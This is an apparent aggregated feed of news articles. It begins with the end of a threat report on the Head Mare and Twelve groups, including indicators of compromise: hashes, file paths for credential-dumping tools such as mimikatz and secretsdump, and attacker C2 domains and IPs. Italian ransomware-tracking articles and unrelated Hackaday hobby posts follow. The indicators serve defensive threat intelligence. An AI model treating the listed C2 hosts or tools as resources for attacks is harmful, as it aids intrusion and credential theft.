They also use tools previously seen in attacks by other groups, such as Twelve’s CobInt backdoor.

This is not the only similarity between the two groups. In addition to the toolkit, the following were noticed:

  • Shared command-and-control servers: 360nvidia[.]com, 45.156.27[.]115
  • PowerShell scripts accessing these C2 servers: mcdrive.ps1
  • Scripts for tunneling network connections: proxy.ps1

Based on the factors described above, we assume that Head Mare is working with Twelve to launch attacks on state- and privately controlled companies in Russia. We will continue to monitor the activity of the attackers and share up-to-date information about their TTPs. More details about the hacktivists’ activities and their tools, such as PhantomJitter, can be found in the materials available to subscribers of our Threat Intelligence reports.

Indicators of compromise


Please note: the network addresses given in this section were valid at the time of publication but may become outdated in the future.

Hashes:

6008E6C3DEAA08FB420D5EFD469590C6ADRecon.ps1
09BCFE1CCF2E199A92281AADE0F01CAFcalc.exe, c.exe
70C964B9AEAC25BC97055030A1CFB58Alocker.exe
87EECDCF34466A5945B475342ED6BCF2mcdrive.vbs
E930B05EFE23891D19BC354A4209BE3Emimikatz.exe
C21C5DD2C7FF2E4BADBED32D35C891E6proxy.ps1
96EC8798BBA011D5BE952E0E6398795Dsecretsdump.exe, secretsdump (1).exe
D6B07E541563354DF9E57FC78014A1DCupdate.exe

File paths:
С:\Windows\SYSVOL\Intel\locker.exe
C:\ProgramData\MicrosoftDrive\mcdrive.ps1
C:\ProgramData\MicrosoftDrive\mcdrive.vbs
C:\ProgramData\proxy.ps1
C:\ProgramData\wusa.exe
C:\Users\{USERNAME}\AppData\Roaming\1.bat
C:\Users\{USERNAME}\AppData\Roaming\Microsoft\Windows\Recent\mimikatz.lnk
C:\Users\{USERNAME}\AppData\Roaming\proxy.ps1
C:\Users\{USERNAME}\Desktop\Обработка.epf
C:\Users\{USERNAME}\Desktop\ad_without_dc.ps1
C:\Users\{USERNAME}\Desktop\ADRecon.ps1
C:\Users\{USERNAME}\Desktop\h.txt
C:\Users\{USERNAME}\Desktop\locker.exe
C:\Users\{USERNAME}\Desktop\mimikatz.exe
C:\Users\{USERNAME}\Desktop\mimikatz.log
C:\Users\{USERNAME}\Desktop\secretsdump (1).exe
C:\Users\{USERNAME}\Desktop\secretsdump.exe
C:\Users\{USERNAME}\Downloads\mimikatz-master.zip
C:\users\{USERNAME}\log.exe
C:\windows\adfs\ar\update.exe
C:\windows\system32\inetsrv\c.exe
C:\windows\system32\inetsrv\calc.exe
C:\windows\system32\winsw.exe
C:\Windows\System32\winsws.exe
C:\windows\system32\winuac.exe
C:\Windows\SYSVOL\Intel\mimikatz.exe

IP addresses and domain names:
360nvidia[.]com
web-telegram[.]uk
45.156.27[.]115
45.156.21[.]148
185.229.9[.]27
45.87.246[.]34
185.158.248[.]107
64.7.198[.]109


securelist.com/head-mare-twelv…


Ragazzi, Pronti per i Workshop della RHC Conference? Scopriamo assieme Deepfake, AI, Darkweb, Ethical Hacking, Doxing e Cyberbullismo


Giovedì 8 maggio, la Red Hot Cyber Conference 2025 ospiterà un’intera giornata dedicata ai ragazzi con i Workshop Hands-on (organizzati in collaborazione con Accenture Italia). Si tratta di un’opportunità unica e gratuita per immergersi nel mondo della cybersecurity e della tecnologia in modo pratico e interattivo. Vista la folla dello scorso anno che ha assalito la conferenza durante i workshop, questo anno i workshop si svolgeranno all’interno del teatro che mette ben 800 posti a disposizione.

L’evento si terrà a Roma, presso il Teatro Italia, con accoglienza a partire dalle 11:00 dando modo alle scolaresche che arrivano da fuori Roma di accedere alla manifestazione nei tempi. Il Teatro Italia dista solo 20 minuti a piedi dalla Stazione Termini e 6 minuti a piedi dalla Metro B di Piazza Bologna (circa 600 metri).

L’inizio dei workshop è fissato alle 11:30. Questa giornata sarà dedicata a tutti i ragazzi delle scuole medie, superiori ed università o banalmente dei curiosi che si vorranno immergere nella tecnologia e nella sicurezza informatica in modo pratico, interattivo e coinvolgente.

Registrazione gratuita per i Workshop della giornata di Giovedì 8 Maggio

Come lo faremo


Non solo parole, ma attraverso l’esperienza diretta! Attraverso sessioni tecniche immersive, i ragazzi avranno l’opportunità di sperimentare in prima persona come gli hacker etici testano le vulnerabilità di un sito web, come l’intelligenza artificiale può essere utilizzata per riconoscere oggetti o analizzare deepfake, e come affrontare problemi specifici di cybersecurity. Inoltre, esploreranno il Dark Web in modo sicuro, comprendendo l’importanza dell’Open Source Intelligence (OSINT) e della Cyber Threat Intelligence oltre a parlare di Doxing e Cyberbullismo.

Questa iniziativa avrà la caratteristica “hands on”. In informatica, l’espressione “hands-on” si riferisce a un approccio pratico e concreto all’apprendimento o all’esecuzione di specifici compiti. Significa letteralmente “mani sopra” e implica l’effettiva manipolazione, sperimentazione o applicazione di conoscenze o abilità in un contesto pratico anziché limitarsi a una comprensione teorica o astratta.

Ti invitiamo a portare il tuo portatile con il sistema operativo che preferisci, così potrai partecipare attivamente agli esercizi insieme ai nostri esperti. Se qualche passaggio ti sfuggirà, nessun problema: tutti i workshop saranno registrati e disponibili sul nostro canale YouTube, così potrai rivederli quando vuoi, proprio come negli anni precedenti.

[strong][url=http://rhc-conference-2025-workshop.eventbrite.it/]Registrazione gratuita per i Workshop della giornata di Giovedì 8 Maggio[/url][/strong]
Workshop “hands-on” del 2024 all’interno della Red Hot Cyber Conference 2024

Un’Esperienza Interattiva e Pratica


L’obiettivo non sarà quindi solo “passivo”, ma soprattutto “attivo”, per consentire ai ragazzi di toccare con mano qualcosa che da sempre hanno visto nei film pensando che fosse qualcosa di inarrivabile, attivando nelle loro avide voraci menti un interesse per queste specifiche materie che nessuno gli ha mai fatto provare da vicino.

A differenza delle edizioni precedenti, i workshop saranno concentrati esclusivamente nella giornata dell’8 maggio e offriranno ai partecipanti la possibilità di toccare con mano le tecnologie più innovative, grazie a diverse sessioni pratiche.

Porta il tuo laptop! In alcuni di questi workshop avrai la possibilità di mettere subito mano e provare nella pratica quanto appreso, sotto la guida di esperti del settore.

[strong][url=http://rhc-conference-2025-workshop.eventbrite.it/]Registrazione gratuita per i Workshop della giornata di Giovedì 8 Maggio[/url][/strong]

Programma della Giornata


Di seguito, il programma dettagliato dei workshop che verranno svolti nella giornata di giovedì 8 maggio (che potrete trovare anche nel programma completo della conference):

Perché Partecipare?


  • Esperienza pratica: Non solo teoria, ma esercizi concreti per migliorare le tue competenze.
  • Esperti del settore: Sessioni guidate da professionisti altamente qualificati.
  • Approfondimenti unici: Temi cruciali come ethical hacking, privacy, intelligenza artificiale e cyberbullismo.
  • Networking: Un’opportunità per connettersi con altri appassionati di cybersecurity.

Registrazione gratuita per i Workshop della giornata di Giovedì 8 Maggio
Workshop “hands-on” del 2024 all’interno della Red Hot Cyber Conference 2024

Registrati Subito!


L’ingresso ai Workshop Hands-on richiede una registrazione separata rispetto alla conferenza. Prenota il tuo posto qui: rhc-conference-2025-workshop.e…

Non perdere questa occasione per apprendere, sperimentare e metterti alla prova nel mondo della cybersecurity! Ci vediamo giovedì 8 maggio a Roma!

L'articolo Ragazzi, Pronti per i Workshop della RHC Conference? Scopriamo assieme Deepfake, AI, Darkweb, Ethical Hacking, Doxing e Cyberbullismo proviene da il blog della sicurezza informatica.


A Decade Resistance Box From PCBs


One of those useful things to have around on your bench is a decade resistance box, essentially a dial-a-resistance instrument. They used to be quite expensive in line with the cost of close-tolerance resistors, but the prices have come down and it’s within reach to build your own. Electronic design consultancy Dekimo have a nice design for one made from a series of PCBs which they normally give out at trade fairs, but now they’ve released the files for download.

It’s released as Gerbers and BOM with a pick-and-place file only, and there’s no licence so it’s free-as-in-beer, but that should be enough if you fancy a go. Our Gerber viewer is playing up so we’re not entirely sure how reliable using PCBs as wafer switches will be long-term, but since the pictures are all ENIG boards we’d guess the gold plating will be much better than the HASL on all those cheap multimeters.

We like this as a conference giveaway, being used to badges it’s refreshing to see a passive take on a PCB artwork. Meanwhile this isn’t the first resistance box we’ve seen with unconventional switches.


hackaday.com/2025/03/13/a-deca…


Arriva NightSpire! Un Nuovo Attore nel Panorama del Ransomware


Nelle ricognizioni nel mondo dell’underground e dei gruppi criminali svolte dal laboratorio di intelligence delle minacce DarkLab di Red Hot Cyber, ci siamo imbattuti all’interno di un Data Leak Site di una cyber gang mai monitorata prima: NightSpire.

Si tratta di un nuovo gruppo ransomware che sembra essersi affacciato recentemente sulla scena del cybercrime. Sebbene non si abbiano informazioni pregresse su questo attore, l’analisi del loro data leak site (DLS) e della loro comunicazione fornisce alcuni indizi chiave sulla loro strategia e modalità operative.

Il gruppo si autodefinisce come una minaccia inarrestabile per le aziende e promette di sfruttare ogni vulnerabilità a loro vantaggio. Di seguito, analizziamo i dettagli del loro portale e le possibili implicazioni della loro attività.

NightSpire: Identità e Dichiarazioni Pubbliche


La sezione “About” del sito di NightSpire contiene un messaggio intimidatorio, tipico dei gruppi ransomware che cercano di diffondere il terrore tra le aziende. Il linguaggio utilizzato richiama quello di attori ben noti come BlackCat, LockBit e Conti, sottolineando la loro intenzione di colpire organizzazioni vulnerabili e minacciarle per ottenere un riscatto.

Testo dalla sezione “About”:
“NightSpire, gli architetti ombra del caos digitale, prosperano distruggendo la sacralità delle fortezze aziendali. Con precisione spietata, infiltriamo i più profondi depositi di dati, senza lasciare alcun byte intatto. Temeteci, perché NightSpire è l’araldo della vostra rovina, la mano invisibile che sfrutterà ogni vostra vulnerabilità finché non vi inginocchierete davanti alle nostre richieste.”

Questa retorica è un chiaro segnale di cyber-intimidazione, che mira a rafforzare l’immagine del gruppo come una minaccia inarrestabile e a destabilizzare le vittime.

Analisi del Data Leak Site (DLS)


NightSpire utilizza un data leak site per pubblicare informazioni sulle aziende compromesse, un modus operandi ormai comune nei gruppi ransomware. Il portale presenta una sezione “Databases”, dove vengono elencate le vittime, con dettagli su:

  • Data dell’attacco
  • Data della pubblicazione del leak
  • Dimensione dei dati esfiltrati
  • Paese della vittima

Dalle immagini analizzate, si possono notare alcune aziende colpite:

Alcuni di questi leak risultano ancora in conto alla rovescia, suggerendo che il gruppo segue la strategia del double extortion: minaccia di pubblicare i dati rubati se il riscatto non viene pagato. Quando il timer raggiunge lo zero, i dati vengono resi pubblici.

Questa tecnica viene utilizzata per esercitare ulteriore pressione sulle vittime, inducendole a pagare per evitare danni alla reputazione e perdite di dati sensibili.

Struttura di Contatto e Canale Telegram


NightSpire offre diversi metodi di contatto attraverso la sua pagina dedicata. Oltre alle classiche email su servizi ProtonMail e OnionMail, hanno anche un canale su Telegram, utilizzato spesso dai gruppi ransomware per comunicare aggiornamenti sui leak, negoziare riscatti e fornire istruzioni alle vittime.

Metodi di contatto identificati:


  • Email
  • Contact Form
  • Telegram

Il canale Telegram è probabilmente utilizzato per annunciare nuovi attacchi, interagire con le vittime e gestire le comunicazioni con potenziali affiliati o venditori di dati.

Caratterizzazione del Gruppo


Sebbene non si abbiano ancora informazioni dettagliate sulla loro provenienza o sulle loro tecniche di attacco, alcuni elementi suggeriscono che NightSpire potrebbe essere un gruppo emergente con forti influenze dai modelli RaaS (Ransomware-as-a-Service) già esistenti.

Possibili caratteristiche operative:

  • Utilizzo del doppio ricatto (Double Extortion)
  • Portale DLS con timer per il rilascio dati
  • Canale Telegram per comunicazioni
  • Target su aziende di diverse regioni globali
  • Estetica e comunicazione simili a gruppi ransomware avanzati

Se si tratta di un nuovo gruppo indipendente o di un rebrand di un attore già esistente è ancora da determinare.

Conclusioni e Considerazioni Finali


NightSpire si presenta come una nuova minaccia nel panorama ransomware. L’assenza di riferimenti a gruppi preesistenti rende difficile tracciare una linea diretta con attori noti, ma il loro modus operandi è chiaramente ispirato a tecniche già collaudate.

Le aziende devono adottare strategie di cyber resilience, rafforzando la protezione degli endpoint, implementando piani di risposta agli incidenti e migliorando la formazione del personale per mitigare il rischio di compromissioni.

Continueremo a monitorare NightSpire per identificare le loro tattiche e procedure operative, valutando il loro impatto nel cybercrime globale.

L'articolo Arriva NightSpire! Un Nuovo Attore nel Panorama del Ransomware proviene da il blog della sicurezza informatica.


Meshtastic Adds Wireless Connectivity to Possum Trap


Perhaps every gardener to attempt to grow a tomato, lettuce, or bean has had to contend with animals trying to enjoy the food before the gardener themselves can, whether it’s a groundhog, rabbit, mouse, crow, or even iguana. There are numerous ways to discourage these mischievous animals from foraging the garden beds including traps, but these devices have their downsides as well. False alarms can be a problem as well as trapping animals that will be overly aggravated to be inside the trap (like skunks) and while the latter problem can’t easily be solved by technology, the former can with the help of Meshtastic.

[Norman Jester]’s problem was an errant possum, but these nocturnal animals generally come out while humans are asleep, and other nighttime animals like rats can activate the trap and then escape. To help with this, a Meshtastic node was added to the San Diego mesh using a 3.5mm audio jack as a detector. When the trap is activated, the closing door yanks a plug out of the jack, alerting the node that the trap has been closed. If it’s a false alarm the trap can be easily and quickly reset, and if a possum has found its way in then it can be transported to a more suitable home the next day.

It’s worth noting that American possums (distinct from the Australian animals of the same name) are an often-misunderstood animal that generally do more good than harm. They help to control Lyme disease, eat a lot of waste that other animals won’t, don’t spread rabies, and don’t cause nearly as much disruption to human life as other animals like feral cats or raccoons. But if one is upsetting a garden or another type of animal is causing a disturbance, this Meshtastic solution does help solve some of the problems with live traps. For smaller animals, though, take a look at this Arudino-powered trap instead.

Thanks to [Dadsrcworkbench] for the tip!

youtube.com/embed/prx-Bxpf7RU?…


hackaday.com/2025/03/12/meshta…


A Fast Rewind to the Era of Tapesponding


Newspaper clipping with words 'speaking personally' and a photo

Imagine a time before Discord servers and cheap long-distance calls. Back in the 1950s, a curious and crafty group of enthusiasts invented their own global social network: on reels of magnetic tape. They called it tapesponding (short for tape corresponding), and it was a booming hobby for thousands of radio hams, tinkerers, and audio geeks. Here’s the original video on this analog marvel.

These folks weren’t just swapping mixtapes. They crafted personal audio letters, beamed across the globe on 3-inch reels. DIY clubs emerged everywhere: World Tape Pals (Texas-based, naturally) clocked 5,000 members from “every Free Nation” – which frames it in a world in terms of East vs. West. Some groups even pooled funds to buy shared tape decks in poorer regions – pure hacker spirit. The tech behind it: Speeds of 3¾ IPS, half-track mono, round-robin reels, and rigorous trust networks to avoid ghosters. Honestly, it makes IRC net ops look soft. Tapesponding wasn’t just for chatty types. It fostered deep friendships, even marriages. It was social engineering before that term was coined. The video is below the break.

What are your thoughts on this nostalgic way of long-distance communication? The warm whirring of a spinning tape reel? The waiting time before your echo is returned? Or are have you skipped all the analog mechanics and shouted out into the LoRaWAN void long ago?

youtube.com/embed/4t9H14XfkPc?…


hackaday.com/2025/03/12/a-fast…


EPROM-based Enigma Machine


The Enigma machine is perhaps one of the most legendary devices to come out of World War II. The Germans used the ingenious cryptographic device to hide their communications from the Allies, who in turn spent an incredible amount of time and energy in finding a way to break it. While the original Enigma was a complicated electromechanical contraption, [DrMattRegan] recently set out to show how its operation can be replicated with an EPROM.

The German Enigma machine was, for the time, an extremely robust way of coding messages. Earlier versions proved somewhat easy to crack, but subsequent machines added more and more complexity rendering them almost impenetrable. The basis of the system was a set of rotors which encrypted each typed letter to a different one based on the settings and then advanced one place in their rotation, ensuring each letter was encrypted differently than the last. Essentially this is a finite-state machine, something perfectly suited for an EPROM. With all of the possible combinations programmed in advance, an initial rotor setting can be inputted, and then each key press is sent through the Enigma emulator which encrypts the letter, virtually advances the rotors, and then moves to the next letter with each clock cycle.

[DrMattRegan]’s video, also linked below, goes into much more historical and technical detail on how these machines worked, as well as some background on the British bombe, an electromechanical device used for decoding encrypted German messages. The first programmable, electronic, digital computer called Colossus was also developed to break encrypted Enigma messages as well, demonstrating yet another technology that came to the forefront during WWII.

youtube.com/embed/yKOzgzsezyc?…

Thanks to [Clint] for the tip!


hackaday.com/2025/03/12/eprom-…


FLOSS Weekly Episode 824: Gratuitous Navel Gazing


This week, Jonathan Bennett chats with Doc Searls about SCaLE and Personal AI! What’s the vision of an AI that consumers run themselves, what form factor might that take, and how do we get there?


youtube.com/embed/Lc9qmz_dyxg?…

Did you know you can watch the live recording of the show right on our YouTube Channel? Have someone you’d like us to interview? Let us know, or contact the guest and have them contact us! Take a look at the schedule here.

play.libsyn.com/embed/episode/…

Direct Download in DRM-free MP3.

If you’d rather read along, here’s the transcript for this week’s episode.

Places to follow the FLOSS Weekly Podcast:


Theme music: “Newer Wave” Kevin MacLeod (incompetech.com)

Licensed under Creative Commons: By Attribution 4.0 License


hackaday.com/2025/03/12/floss-…


FlyingCam is a Sweet DIY Webcam on a Stick


Imagine you want to monitor a pot on the stove to see if it’s boiling over for just a few minutes, but you don’t want to have a dedicated permanent IP webcam solution in your kitchen. [Sebastian Duell]’s FlyingCam hijacks an IKEA lamp gooseneck to become something you never knew you needed: a wireless camera for short-term random remote observation. It’s a beautiful combination of 3D printing and commercial device re-use, and when paired with his DIY wireless screen, it’s a complete solution.

The guts of this project aren’t critical, or expensive. It’s built around one of those ESP32 single-board webcams, with an added fan, battery pack, antenna, and a power switch. You turn it on, and the AP in the ESP32 fires up, or optionally connects to your network. Point the camera at your target and you’re set, at least if you want to sit by your computer. But [Sebastian] also designed a nice simple remote screen, so you can keep tabs on your spaghetti wherever you roam around the house.

We love the attention to keeping the design simple here, both in form and in function. It’s a one-task device, so it’s important that it be extremely easy to use, and it’s hard to beat just pointing the thing and turning on a switch. And it doesn’t hurt that it’s good looking to boot.

IKEA stuff is cheap and cheerful, but often it’s missing just that one functionality that we want. What good is an air-quality sensor without MQTT logging capability, for instance? Or a standing desk that can’t remember set heights? Get hacking!


hackaday.com/2025/03/12/flying…


Pixel Watch 3’s Loss of Pulse Detection: the Algorithms That Tell Someone is Dying


More and more of the ‘smart’ gadgets like watches and phones that we carry around with us these days come with features that we’d not care to ever need. Since these are devices that we strap onto our wrists and generally carry in close proximity to our bodies, they can use their sensors to make an estimation of whether said body is possibly in the process of expiring. This can be due to a severe kinetic event like a car crash, or something more subtle like the cessation of the beating of one’s heart.

There is a fairly new Loss of Pulse Detection (LoPD) feature in Google’s Pixel Watch 3 that recently got US FDA approval, allowing it to be made available in the US after previously becoming available in over a dozen European countries following its announcement in August of 2024. This opt-in feature regularly polls whether it can detect the user’s pulse. If not found, it cascades down a few steps before calling emergency services.

The pertinent question here is always whether it is truly detecting a crisis event, as nobody wants to regularly apologize for a false alert to the overworked person staffing the 911 or equivalent emergency line. So how do you reliably determine that your smart watch or phone should dial emergencies forthwith?

Budget Medical Devices


One of the amazing things about technological progress is that sensors and processing capabilities that were rather exotic a few decades ago are now being included in just about any smart device you can strap on your wrist. This includes motion sensors, pulse- and oxygen level meters, making these devices in theory capable of acting like ambulatory cardiac monitors and similar medical devices that monitor health parameters and respond to emergencies.

While for a long time the gold standard for heart function monitoring over a longer period outside a hospital setting involved a portable electrocardiogram (ECG) recorder, recently wrist-worn monitoring devices based around photoplethysmography (PPG) have prove themselves to acceptable substitutes. In a 2018 study by Francesco Sartor et al. in BMC Sports Science, Medicine and Rehabilitation the researchers found that the wrist-worn PPG was not as accurate as the ECG-based chest strap monitor, but came close enough to be practical.

Here the difference is such that applications where precision actually matters the chest strap ECG is still the optimal choice, but wrist-worn PPG devices as integrated into many fitness bands and smart watches are an acceptable substitute, such as when monitoring heart rate for signs of atrial fibrillation. A 2022 study by Christopher Ford et al. in JACC: Clinical Electrophysiology examined two smart watches (Apple Watch 4, KardiaBand) for this purpose, finding that their accuracy here was 91% and 87% respectively.

Together with additional sensors like the commonly integrated motion sensor, these devices seem accurate enough to at least determine whether the person wearing them is suffering a cardiac event that requires immediate intervention.

Health Check


The idea of an automatic emergency call isn’t new, with for example the EU making such a system (called eCall) mandatory in new cars since 2018. The idea is that when a serious collision is detected, emergency services are contacted and provided with location and sensor data. Google added its Car Crash Detection feature to the Pixel 3 smartphone in 2019, and Apple added Crash Detection to its Apple Watch and iPhones in 2022. These use sensor data from gyroscopes, GPS, microphones, and accelerometers to determine whether a crash just occurred.

What users of these devices discovered, however, was that activities such as going on a rollercoaster ride could activate this feature, as well as snowmobile rides, skiing, and similar activities. In response, Apple had to adjust its algorithms on these devices to reduce the number of false positives. Despite this, rescue workers in e.g. Canada are still reporting a large number of false positives. One reason cited is that although there’s a time-out before emergency line is called with audible alarm, this can be hard to hear when you’re on a snowmobile.

As it turns out, defining what seems like a pretty clear event to us when you’re limited to just this handful of sensors is much trickier than it seems. After all, what is different between the sensor data from a rollercoaster ride, a car crash, dropping one’s phone or smart watch onto a concrete floor or forgetting said phone on the roof of the car?

In this context, the idea of taking a simple activity like measuring heart rate and pulse, and extrapolating from these that if they cease, an emergency has occurred is fraught with pitfalls as well.

Merging Data


How do you know as a human being that someone has just suffered cardiac arrest? You confirm that they don’t have a noticeable (carotid) pulse, and the reason why you checked is because they clearly collapsed. This is when you’d pull out your phone and dial emergency services. The LoPD feature that Google has introduced has to do effectively exactly these steps, except that it starts from the loss of pulse (LoP) rather than from seeing someone pass out and collapse to the ground.

Thus the tricky part is establishing whether said collapsing has occurred, not whether the pulse has been lost. After all, the user may have simply taken the watch off. According to Google, to verify their algorithms they hired stunt actors to simulate LoP using a tourniquet (cutting off blood flow) and simulating falls like a person suffering cardiac arrest would suffer.

On the sensor side they use the heart rate monitor (PPG sensor), which initially uses the green light to check for pulse, but can switch to infrared and red lights when a LoP condition is triggered. Simultaneously the motion sensor data is consulted, with a lack of motion taken as a sign that we’re dealing with a LoPD. This starts an auditory alarm and visual countdown on the screen before emergency services are contacted with an automated message plus the user’s location.

To calibrate the response to this merged sensor data with clinical data on e.g. cardiological events before trialing the result with said stunt actors and volunteers. An article on this research was also published in Nature (paywalled, gift article), detailing the algorithm and the way they tested its effectiveness. In the paper the authors note one false positive event and subsequent emergency call across 21.67 user-years across two studies, with a sensitivity of 67.23%.

A Matter Of Time

Chain of survival in case of cardiac arrest. (Credit: European Resuscitation Council)Chain of survival in case of cardiac arrest. (Credit: European Resuscitation Council)
In the case of cardiac arrest, time is of the absolute essence. This is also clearly noted in the Google paper on the LoPD feature, who note that ideally there is a witness on-site who can immediately begin CPR or (ideally) get a nearby automated external defibrillator (AED). Unfortunately in most cases of cardiac arrest, this event goes initially unnoticed. The LoPD feature on a smart watch thus would be for cases where nobody is around to notice the emergency and respond to it. Although it isn’t explicitly mentioned, it seems that the watch can also detect whether it’s being worn or not, which should prevent false positives there.

With each year over half a million US citizens alone suffering cardiac arrest and over half of these occurring outside of a hospital setting, this could potentially save thousands of lives each year. Following cardiac arrest and in the absence of resuscitation the lack of blood (and oxygen) being circulated means that within minutes organs begin to suffer the harmful effects, depending on their oxygen requirements. The brain is generally the first to suffer ill effects, which is why the application of CPR is so crucial.

Because of the intense urgency following a major cardiac event like this, the practical use of this LoPD feature will be highly dependent on the location where the emergency occurs. In the case of e.g. someone collapsing while alone at home in their city house or apartment, this could conceivably save their life if emergency services can arrive within minutes. Even faster and more useful in less urban settings would probably be having your smart device notify nearby people who can then perform CPR while calling 911 or equivalent.

That said, perhaps the real killer feature that’s missing here is an integrated AED in smartphones since everyone has one of those things on them at all times, or even smart watches that can automatically perform defibrillation while also notifying emergency services.


hackaday.com/2025/03/12/pixel-…


FUNKSEC rivendica un attacco Informatico All’Università di Modena e Reggio Emilia. Scopri i dettagli


Nella giornata di oggi, la banda di criminali informatici di FUNKSEC rivendica all’interno del proprio Data Leak Site (DLS) un attacco informatico all’università italiana di Modena e di Reggio Emilia. Nel post pubblicato nel loro blog presente nel clear web (e nelle underground) i criminali informatici riportato che la gang è in possesso di 1GB di dati, esfiltrati dalle infrastrutture IT dell’azienda. Minacciano la pubblicazione tra 7 giorni ed 11 ore.

Al momento, non possiamo confermare la veridicità della notizia, poiché l’organizzazione non ha ancora rilasciato alcun comunicato stampa ufficiale sul proprio sito web riguardo l’incidente. Pertanto, questo articolo deve essere considerato come ‘fonte di intelligence’.

I criminali informatici, per poter attestare che l’accesso alle infrastrutture informatiche è avvenuto con successo, riportano una serie di documenti (samples) afferenti all’azienda.

Questo modo di agire – come sanno i lettori di RHC – generalmente avviene quando ancora non è stato definito un accordo per il pagamento sul riscatto richiesto da parte dei criminali informatici. In questo modo, i criminali minacciando la pubblicazione dei dati in loro possesso, aumentano la pressione verso l’organizzazione violata, sperando che il pagamento avvenga più velocemente.

Da tenere in considerazione che questa cybergang, a differenza delle altre, ha un sito web esposto sulla rete internet, pertanto risulta accessibile nel clear web a chiunque, ed indicizzabili dai motori di ricerca.

Visto che (come scopriremo più avanti) FUNKSEC spesso ha riciclato informazioni di precedenti data leak o attività di hacktivismo, rimane da capire quanto questa rivendicazione sia fondata e pertanto deve essere considerata come “informazione di intelligence”.

Come nostra consuetudine, lasciamo sempre spazio ad una dichiarazione da parte dell’azienda qualora voglia darci degli aggiornamenti sulla vicenda. Saremo lieti di pubblicare tali informazioni con uno specifico articolo dando risalto alla questione.

RHC monitorerà l’evoluzione della vicenda in modo da pubblicare ulteriori news sul blog, qualora ci fossero novità sostanziali. Qualora ci siano persone informate sui fatti che volessero fornire informazioni in modo anonimo possono utilizzare la mail crittografata del whistleblower.

La cybergang Funk Sec


Il gruppo ransomware FunkSec è emerso pubblicamente per la prima volta alla fine del 2024 (come riportano i ricercatori di CheckPoint) e ha rapidamente guadagnato notorietà pubblicando oltre 85 vittime dichiarate, più di qualsiasi altro gruppo ransomware nel solo mese di dicembre. Presentandosi come una nuova operazione Ransomware-as-a-Service (RaaS), FunkSec sembra non avere connessioni note con gang ransomware precedentemente identificate e sono attualmente disponibili poche informazioni sulle sue origini o operazioni.

L’attività del gruppo indica che i numeri impressionanti di vittime pubblicate potrebbero mascherare una realtà più modesta sia in termini di vittime effettive che di livello di competenza del gruppo. La maggior parte delle operazioni principali di FunkSec sono probabilmente condotte da attori inesperti. Inoltre, è difficile verificare l’autenticità delle informazioni trapelate poiché l’obiettivo principale del gruppo sembra essere quello di ottenere visibilità e riconoscimento. Le prove suggeriscono che in alcuni casi le informazioni trapelate sono state riciclate da precedenti fughe di notizie correlate ad attività di attivismo, sollevando dubbi sulla loro autenticità.

FunkSec a legami con il mondo dell’hacktivismo e utilizzano strumenti pubblici , tra cui un ransomware personalizzato probabilmente sviluppato da un autore di malware relativamente inesperto con sede in Algeria. I risultati indicano che lo sviluppo degli strumenti del gruppo, incluso il ransomware, è stato probabilmente assistito dall’intelligenza artificiale, il che potrebbe aver contribuito alla loro rapida iterazione nonostante l’apparente mancanza di competenza tecnica dell’autore

Questo caso evidenzia la linea sempre più sfocata tra hacktivismo e criminalità informatica, sottolineando le sfide nel distinguere l’uno dall’altro. Se tale distinzione esista realmente, o se gli operatori ne siano consapevoli o siano interessati a definirla, resta incerto. Ancora più importante, mette anche in discussione l’affidabilità degli attuali metodi per valutare il rischio rappresentato dai gruppi ransomware, soprattutto quando tali valutazioni si basano sulle affermazioni pubbliche degli stessi attori.

L’Università di Modena e di Reggio Emilia


Fin dalle sue origini risalenti al lontano 1175, l’Ateneo ha rappresentato il fulcro della vita scientifica, culturale e sociale e, seppur con fortune alterne legate ai locali mutamenti politici susseguitisi nel corso dei secoli, l’Ateneo si è progressivamente ampliato per diventare una Università multidisciplinare, attiva e dinamica.

Con circa 30.000 studentesse e studenti iscritti ai corsi di studio di I, II e III livello e oltre 1.400 dipendenti tra personale docente, ricercatore e tecnico-amministrativo, Unimore rientra tra gli Atenei di grandi dimensioni, è organizzata a rete di sedi (Modena e Reggio Emilia) ed è costituita da 13 Dipartimenti e 2 Facoltà/Scuole a cui si affiancano le città di Mantova e Carpi (sedi accreditate di Corsi di laurea), oltre che da centri interdipartimentali dislocati sul territorio delle due province di Modena e di Reggio Emilia, dove si svolgono attività di didattica, ricerca, terza missione e relativi servizi a supporto e di trasferimento tecnologico.

Cos’è il ransomware as a service (RaaS)


Il ransomware, è una tipologia di malware che viene inoculato all’interno di una organizzazione, per poter cifrare i dati e rendere indisponibili i sistemi. Una volta cifrati i dati, i criminali chiedono alla vittima il pagamento di un riscatto, da pagare in criptovalute, per poterli decifrare.

Qualora la vittima non voglia pagare il riscatto, i criminali procederanno con la doppia estorsione, ovvero la minaccia della pubblicazione di dati sensibili precedentemente esfiltrati dalle infrastrutture IT della vittima.

Per comprendere meglio il funzionamento delle organizzazioni criminali all’interno del business del ransomware as a service (RaaS), vi rimandiamo a questi articoli:


Come proteggersi dal ransomware


Le infezioni da ransomware possono essere devastanti per un’organizzazione e il ripristino dei dati può essere un processo difficile e laborioso che richiede operatori altamente specializzati per un recupero affidabile, e anche se in assenza di un backup dei dati, sono molte le volte che il ripristino non ha avuto successo.

Infatti, si consiglia agli utenti e agli amministratori di adottare delle misure di sicurezza preventive per proteggere le proprie reti dalle infezioni da ransomware e sono in ordine di complessità:

  • Formare il personale attraverso corsi di Awareness;
  • Utilizzare un piano di backup e ripristino dei dati per tutte le informazioni critiche. Eseguire e testare backup regolari per limitare l’impatto della perdita di dati o del sistema e per accelerare il processo di ripristino. Da tenere presente che anche i backup connessi alla rete possono essere influenzati dal ransomware. I backup critici devono essere isolati dalla rete per una protezione ottimale;
  • Mantenere il sistema operativo e tutto il software sempre aggiornato con le patch più recenti. Le applicazioni ei sistemi operativi vulnerabili sono l’obiettivo della maggior parte degli attacchi. Garantire che questi siano corretti con gli ultimi aggiornamenti riduce notevolmente il numero di punti di ingresso sfruttabili a disposizione di un utente malintenzionato;
  • Mantenere aggiornato il software antivirus ed eseguire la scansione di tutto il software scaricato da Internet prima dell’esecuzione;
  • Limitare la capacità degli utenti (autorizzazioni) di installare ed eseguire applicazioni software indesiderate e applicare il principio del “privilegio minimo” a tutti i sistemi e servizi. La limitazione di questi privilegi può impedire l’esecuzione del malware o limitarne la capacità di diffondersi attraverso la rete;
  • Evitare di abilitare le macro dagli allegati di posta elettronica. Se un utente apre l’allegato e abilita le macro, il codice incorporato eseguirà il malware sul computer;
  • Non seguire i collegamenti Web non richiesti nelle e-mail;
  • Esporre le connessione Remote Desktop Protocol (RDP) mai direttamente su internet. Qualora si ha necessità di un accesso da internet, il tutto deve essere mediato da una VPN;
